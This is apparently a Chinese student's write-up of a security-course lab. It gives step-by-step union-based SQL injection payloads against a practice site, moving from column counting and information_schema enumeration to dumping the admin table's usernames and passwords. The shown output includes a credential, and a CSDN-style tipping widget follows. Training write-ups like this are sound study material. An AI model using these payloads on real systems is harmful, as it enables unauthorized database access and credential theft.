掌控安全-为了女神小芳-避坑思路

1,判断是否存在SQL注入漏洞
最重要的一步,即判断网站是否会对一些SQL语句进行过滤,如何过滤,这方面需要对服务器接收数据的servlet或PHP语句有深入理解
例如:接收数据时会对数据进行区分result=‘字符串’或result=数字 我们需要通过多次注入对其代码格式进行逆向推测
2,判断字段数
?id=1 order by 1
由于union select需要与数据表列数一样才会正确显示
3,判断回显点
?id=1 and 1=2 union select 1,2
其中union前要求无法被搜索到(即判断为错)这样才能使后面的联合查询位于回显表第一行可以更可能被回显出来
4,利用回显点正式开始注入
?id=1 and 1=2 union select 1,version() SQL数据库版本号:5.5.53
?id=1 and 1=2 union select 1,database() 数据库名字:maoshe
SQL数据库存在一个数据库记录有本地所有数据库名,数据表名,列名
例如:information_schema.tables 记录数据库对应的数据表名
information_schema.columns 记录数据表对应的所有列的名字
5,联合得表名
group_concat()可以将多个数据当成一个数据进行拼接,使其显示到一个格子里
?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
得到所有这个数据库的所以数据表名(admin,dirs,news,xss)
6,联合得列名
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’
列名(Id,username,password)
7,然后嘿嘿嘿
?id=1 and 1=2 union select 1,group_concat(id,’:’,username,’:’,password) from admin
得到用户名及密码1:admin:hellohack,2:ppt领取微信:zkaqbanban

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值